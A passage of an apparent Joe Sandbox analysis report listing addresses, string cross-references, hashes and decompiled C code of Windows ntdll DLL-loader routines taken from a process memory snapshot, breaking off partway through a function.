                                                            0x1ec64016
                                                            0x1ec64017
                                                            0x1ec6401b
                                                            0x1ec6401e
                                                            0x00000000
                                                            0x1ec6401e
                                                            0x1ec63fb6
                                                            0x1ec63eb1
                                                            0x1ec63eb4
                                                            0x1ec63eb7
                                                            0x1ec63ebc
                                                            0x1ecb82a9
                                                            0x1ecb82ab
                                                            0x1ec63ec2
                                                            0x1ec63ed3
                                                            0x1ec63ed5
                                                            0x1ec63ed8
                                                            0x1ec63ed8
                                                            0x1ec63edd
                                                            0x1ecb82b3
                                                            0x1ecb82b6
                                                            0x00000000
                                                            0x1ec63ee3
                                                            0x1ec63ee8
                                                            0x1ec63eed
                                                            0x1ec63ef0
                                                            0x1ec63ef3
                                                            0x1ec63f02
                                                            0x1ec63f05
                                                            0x1ec63f08
                                                            0x1ecb82c0
                                                            0x1ecb82c3
                                                            0x1ecb82c5
                                                            0x1ecb82c8
                                                            0x1ecb82d0
                                                            0x1ecb82e4
                                                            0x1ecb82e6
                                                            0x1ecb82e6
                                                            0x1ecb82ed
                                                            0x1ecb82f4
                                                            0x1ecb82f7
                                                            0x1ecb82f8
                                                            0x1ecb82fc
                                                            0x1ecb82ff
                                                            0x1ecb82ff
                                                            0x1ec63f0e
                                                            0x1ec63f11
                                                            0x1ec63f16
                                                            0x1ec63f1d
                                                            0x1ec63f31
                                                            0x1ecb8307
                                                            0x1ecb8307
                                                            0x1ec63f31
                                                            0x1ec63f39
                                                            0x1ec63f48
                                                            0x1ec63f4d
                                                            0x1ec63f50
                                                            0x1ec63f50
                                                            0x1ec63f53
                                                            0x1ec63f58
                                                            0x1ec63f65
                                                            0x1ec63f65
                                                            0x1ec63f6a
                                                            0x00000000
                                                            0x1ec63f6a
                                                            0x1ec63edd
                                                            0x1ec63dda
                                                            0x1ec63ddd
                                                            0x1ec63de0
                                                            0x1ec63de5
                                                            0x1ecb8245
                                                            0x1ec63deb
                                                            0x1ec63df7
                                                            0x1ec63dfc
                                                            0x1ec63dfe
                                                            0x1ec63e01
                                                            0x1ec63e01
                                                            0x1ec63e06
                                                            0x1ecb824d
                                                            0x1ecb824f
                                                            0x1ecb8254
                                                            0x00000000
                                                            0x1ec63e0c
                                                            0x1ec63e11
                                                            0x1ec63e16
                                                            0x1ec63e19
                                                            0x1ec63e29
                                                            0x1ec63e2c
                                                            0x1ec63e2f
                                                            0x1ecb825c
                                                            0x1ecb825f
                                                            0x1ecb8261
                                                            0x1ecb8264
                                                            0x1ecb826c
                                                            0x1ecb8280
                                                            0x1ecb8282
                                                            0x1ecb8282
                                                            0x1ecb8289
                                                            0x1ecb8290
                                                            0x1ecb8293
                                                            0x1ecb8294
                                                            0x1ecb8298
                                                            0x1ecb829b
                                                            0x1ecb829b
                                                            0x1ec63e35
                                                            0x1ec63e38
                                                            0x1ec63e3d
                                                            0x1ec63e44
                                                            0x1ec63e58
                                                            0x1ecb82a3
                                                            0x1ecb82a3
                                                            0x1ec63e58
                                                            0x1ec63e60
                                                            0x1ec63e6f
                                                            0x1ec63e74
                                                            0x1ec63e77
                                                            0x1ec63e77
                                                            0x1ec63e7a
                                                            0x1ec63e7f
                                                            0x1ec63e8c
                                                            0x1ec63e8c
                                                            0x1ec63e91
                                                            0x00000000
                                                            0x1ec63e91

                                                            Strings
                                                            • Kernel-MUI-Language-Disallowed, xrefs: 1EC63E97
                                                            • WindowsExcludedProcs, xrefs: 1EC63D6F
                                                            • Kernel-MUI-Number-Allowed, xrefs: 1EC63D8C
                                                            • Kernel-MUI-Language-Allowed, xrefs: 1EC63DC0
                                                            • Kernel-MUI-Language-SKU, xrefs: 1EC63F70
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                            • API String ID: 0-258546922
                                                            • Opcode ID: 5d2092a78608d36e7a85bc9c0e35bc8bc6a666542051d2a651388d4a643470a8
                                                            • Instruction ID: ac8154384c595a024e97bee04bac3bc1b53b63173eb0bb92fc639155f244835f
                                                            • Opcode Fuzzy Hash: 5d2092a78608d36e7a85bc9c0e35bc8bc6a666542051d2a651388d4a643470a8
                                                            • Instruction Fuzzy Hash: 4FF11A76D10659EFCB01CF99CD80ADFB7BABF48650F11066AE505A7350DB34AE01CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC88E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 44%
                                                            			E1EC88E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1ed4d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1ed48464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1ed45780 & 0x00000003) != 0) {
							E1ECD5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1ed45780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1EC9B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1ed47984; // 0x2e52cd0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1ed48464; // 0x74790110
					 *0x1ed4b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1EC89B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1ed45780 & 0x00000005) != 0) {
						_push(_t49);
						E1ECD5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                            0x1ec88e0f
                                                            0x1ec88e16
                                                            0x1ec88e19
                                                            0x1ec88e1b
                                                            0x1ec88e21
                                                            0x1ec88e7f
                                                            0x1ec88e85
                                                            0x1ecc9354
                                                            0x1ecc936c
                                                            0x1ecc9371
                                                            0x1ecc937b
                                                            0x1ecc9381
                                                            0x1ecc9381
                                                            0x1ecc937b
                                                            0x1ec88e9d
                                                            0x1ec88e9d
                                                            0x1ec88e29
                                                            0x1ec88e2c
                                                            0x1ec88e38
                                                            0x1ec88e3e
                                                            0x1ec88e43
                                                            0x1ec88eb5
                                                            0x1ec88eb9
                                                            0x1ecc92aa
                                                            0x1ecc92af
                                                            0x1ecc92e8
                                                            0x1ecc92e8
                                                            0x1ecc92af
                                                            0x1ec88eb9
                                                            0x1ec88e45
                                                            0x1ec88e53
                                                            0x1ec88e5b
                                                            0x1ec88e5f
                                                            0x1ec88e78
                                                            0x1ec88e78
                                                            0x1ec88e7d
                                                            0x1ec88ec3
                                                            0x1ec88ecd
                                                            0x1ec88ed2
                                                            0x1ec88ed2
                                                            0x1ec88ec5
                                                            0x1ec88ec5
                                                            0x00000000
                                                            0x1ec88e7d
                                                            0x1ec88e67
                                                            0x1ec88ea4
                                                            0x1ecc931a
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc9320
                                                            0x1ec88ea4
                                                            0x1ec88e70
                                                            0x1ecc9325
                                                            0x1ecc9340
                                                            0x1ecc9345
                                                            0x1ecc9345
                                                            0x1ec88e76
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Strings
                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 1ECC9357
                                                            • LdrpFindDllActivationContext, xrefs: 1ECC9331, 1ECC935D
                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1ECC932A
                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 1ECC933B, 1ECC9367
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                            • API String ID: 0-3779518884
                                                            • Opcode ID: 78b51cc080f7a8af62b8cd500bf0f91969e2a1ace3c6a318bf09491e9bfb7919
                                                            • Instruction ID: adb23dcce2e86d11db54a65abc403c0060512b01e499a7db52f179e6a73fb499
                                                            • Opcode Fuzzy Hash: 78b51cc080f7a8af62b8cd500bf0f91969e2a1ace3c6a318bf09491e9bfb7919
                                                            • Instruction Fuzzy Hash: 5741393B90076A9ECB11AB159E98EA7F2A2BB0124DF86436AE80557D58E7306D80C3C1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC68794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 83%
                                                            			E1EC68794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E1EC6934A() != 0) {
								_t159 = E1ECDA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1ed45780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E1ECD5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1ed45780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E1EC6849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E1EC68999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E1EC68999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1ed45c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1ed45c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E1EC72280(_t92, 0x1ed486cc);
															_t94 = E1ED29DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E1EC861A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1ed45c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E1EC68A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1ed45c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1ed45c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E1EC9F380(_t136, 0x1ec31184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E1EC72280(_t108, 0x1ed486cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E1EC861A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E1ED29D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E1EC6FFB0(_t118, _t156, 0x1ed486cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E1EC99A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                            0x1ec68799
                                                            0x1ec6879d
                                                            0x1ec687a1
                                                            0x1ec687a3
                                                            0x1ec687a8
                                                            0x1ec687c3
                                                            0x1ec687c3
                                                            0x1ec687c8
                                                            0x1ec687d1
                                                            0x1ec687d4
                                                            0x1ec687d8
                                                            0x1ec687e5
                                                            0x1ec687ec
                                                            0x1ecb9bfe
                                                            0x1ecb9c00
                                                            0x1ecb9c02
                                                            0x1ecb9c08
                                                            0x1ecb9c0d
                                                            0x1ecb9c0f
                                                            0x1ecb9c14
                                                            0x1ecb9c2d
                                                            0x1ecb9c32
                                                            0x1ecb9c37
                                                            0x1ecb9c3a
                                                            0x1ecb9c3c
                                                            0x1ecb9c42
                                                            0x1ecb9c42
                                                            0x1ecb9c3c
                                                            0x1ecb9c02
                                                            0x1ec687da
                                                            0x1ec687df
                                                            0x1ec687e3
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec687e3
                                                            0x1ec687f2
                                                            0x00000000
                                                            0x1ec687fb
                                                            0x1ec687fd
                                                            0x1ec687fe
                                                            0x1ec6880e
                                                            0x1ec6880f
                                                            0x1ec68810
                                                            0x1ec68814
                                                            0x1ec6881a
                                                            0x1ec6881c
                                                            0x1ec6881f
                                                            0x1ec68821
                                                            0x1ec68822
                                                            0x1ec68824
                                                            0x1ec68826
                                                            0x1ec6882c
                                                            0x1ec6882e
                                                            0x1ecb9c48
                                                            0x1ecb9c48
                                                            0x1ec68834
                                                            0x1ec68834
                                                            0x1ec68837
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec68837
                                                            0x1ec6882e
                                                            0x1ec6883d
                                                            0x1ec68840
                                                            0x1ec68843
                                                            0x1ec68846
                                                            0x1ec68849
                                                            0x1ec6884c
                                                            0x1ec6884e
                                                            0x1ec68850
                                                            0x1ec68852
                                                            0x1ec68854
                                                            0x1ec68857
                                                            0x1ec688b4
                                                            0x1ec688b6
                                                            0x1ec688b6
                                                            0x1ec68859
                                                            0x1ec68859
                                                            0x1ec68859
                                                            0x1ec68861
                                                            0x1ec68866
                                                            0x1ec6886a
                                                            0x1ec6893d
                                                            0x1ec68941
                                                            0x00000000
                                                            0x1ec68947
                                                            0x1ec68947
                                                            0x1ec6894a
                                                            0x1ec6894c
                                                            0x00000000
                                                            0x1ec68952
                                                            0x1ec68955
                                                            0x1ec6895a
                                                            0x1ec6895d
                                                            0x1ec6895d
                                                            0x1ec6895f
                                                            0x1ec68961
                                                            0x1ec68961
                                                            0x1ec68968
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6896a
                                                            0x1ec6896b
                                                            0x1ec6896e
                                                            0x00000000
                                                            0x1ec68970
                                                            0x1ec68970
                                                            0x1ec68970
                                                            0x1ec68970
                                                            0x1ec68972
                                                            0x1ec68972
                                                            0x1ec68974
                                                            0x00000000
                                                            0x1ec6897a
                                                            0x1ec6897a
                                                            0x1ec6897d
                                                            0x00000000
                                                            0x1ec68983
                                                            0x1ecb9c65
                                                            0x1ecb9c6d
                                                            0x1ecb9c72
                                                            0x1ecb9c75
                                                            0x1ecb9c75
                                                            0x1ecb9c82
                                                            0x1ecb9c86
                                                            0x1ecb9c87
                                                            0x1ecb9c88
                                                            0x1ecb9c89
                                                            0x1ecb9c8c
                                                            0x1ecb9c90
                                                            0x1ecb9c95
                                                            0x1ecb9c97
                                                            0x1ecb9ca0
                                                            0x1ecb9ca3
                                                            0x1ecb9ca9
                                                            0x1ecb9ca9
                                                            0x00000000
                                                            0x1ecb9ca9
                                                            0x1ecb9ca3
                                                            0x00000000
                                                            0x1ecb9c97
                                                            0x1ec6897d
                                                            0x00000000
                                                            0x1ec68974
                                                            0x1ec68988
                                                            0x1ec68992
                                                            0x1ec68996
                                                            0x00000000
                                                            0x1ec68996
                                                            0x1ec6894c
                                                            0x00000000
                                                            0x1ec68870
                                                            0x1ec6887b
                                                            0x1ec6887d
                                                            0x1ec6887f
                                                            0x1ec68881
                                                            0x1ec68884
                                                            0x1ec68884
                                                            0x1ec68886
                                                            0x1ec68889
                                                            0x1ec6888c
                                                            0x1ec6888e
                                                            0x1ec68891
                                                            0x1ec68891
                                                            0x1ec68898
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6889a
                                                            0x1ec6889b
                                                            0x1ec6889e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec688a0
                                                            0x1ec688a8
                                                            0x1ec688b0
                                                            0x1ec688b2
                                                            0x1ec688d3
                                                            0x1ec688d5
                                                            0x00000000
                                                            0x1ec688d7
                                                            0x1ec688db
                                                            0x1ec688dc
                                                            0x1ec688e0
                                                            0x1ec688e8
                                                            0x1ec688ee
                                                            0x1ec688f0
                                                            0x1ec688f3
                                                            0x1ec688fc
                                                            0x1ec68901
                                                            0x1ec68906
                                                            0x1ec6890c
                                                            0x1ec6890c
                                                            0x1ec6890f
                                                            0x1ec68916
                                                            0x1ec68917
                                                            0x1ec68918
                                                            0x1ec68919
                                                            0x1ec6891a
                                                            0x1ec6891f
                                                            0x1ec68921
                                                            0x1ecb9c52
                                                            0x1ecb9c55
                                                            0x1ecb9c5b
                                                            0x1ecb9cac
                                                            0x1ecb9cc0
                                                            0x1ecb9cc0
                                                            0x1ecb9c55
                                                            0x1ec68927
                                                            0x1ec68927
                                                            0x1ec6892f
                                                            0x1ec68933
                                                            0x00000000
                                                            0x1ec688f5
                                                            0x1ec688f5
                                                            0x00000000
                                                            0x1ec688f7
                                                            0x1ec688f7
                                                            0x1ec688fa
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec688fa
                                                            0x1ec688f5
                                                            0x1ec688f3
                                                            0x00000000
                                                            0x1ec688d5
                                                            0x00000000
                                                            0x1ec688b2
                                                            0x1ec688c9
                                                            0x00000000
                                                            0x1ec688c9
                                                            0x1ec6887f
                                                            0x1ec6886a
                                                            0x1ec68857
                                                            0x1ec68852
                                                            0x1ec688bf
                                                            0x1ec688bf
                                                            0x1ec687aa
                                                            0x1ec687ad
                                                            0x1ec687ae
                                                            0x1ec687b4
                                                            0x1ec687b5
                                                            0x1ec687b6
                                                            0x1ec687b8
                                                            0x1ec687bd
                                                            0x1ec687c1
                                                            0x1ec687f4
                                                            0x1ec687fa
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec687c1
                                                            0x00000000

                                                            Strings
                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 1ECB9C28
                                                            • LdrpDoPostSnapWork, xrefs: 1ECB9C1E
                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 1ECB9C18
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                            • API String ID: 2994545307-1948996284
                                                            • Opcode ID: eb064619975a608ac9fae6472f9d5e90d1eb866c491db6d9411220bfa27315d8
                                                            • Instruction ID: 8f2d1a6df361b5fa8b1c3be86da4e6af17b80faa4faeccb842a680ae38eb457b
                                                            • Opcode Fuzzy Hash: eb064619975a608ac9fae6472f9d5e90d1eb866c491db6d9411220bfa27315d8
                                                            • Instruction Fuzzy Hash: EA91D0B3A002569FDB08CF59CCD1AABB3B6FF8C314B554269E905AB744DB30E941CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC67E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 98%
                                                            			E1EC67E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E1EC6CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E1EC5C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1ed45780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E1ECD5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1ed45780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E1EC77D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E1EC77D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
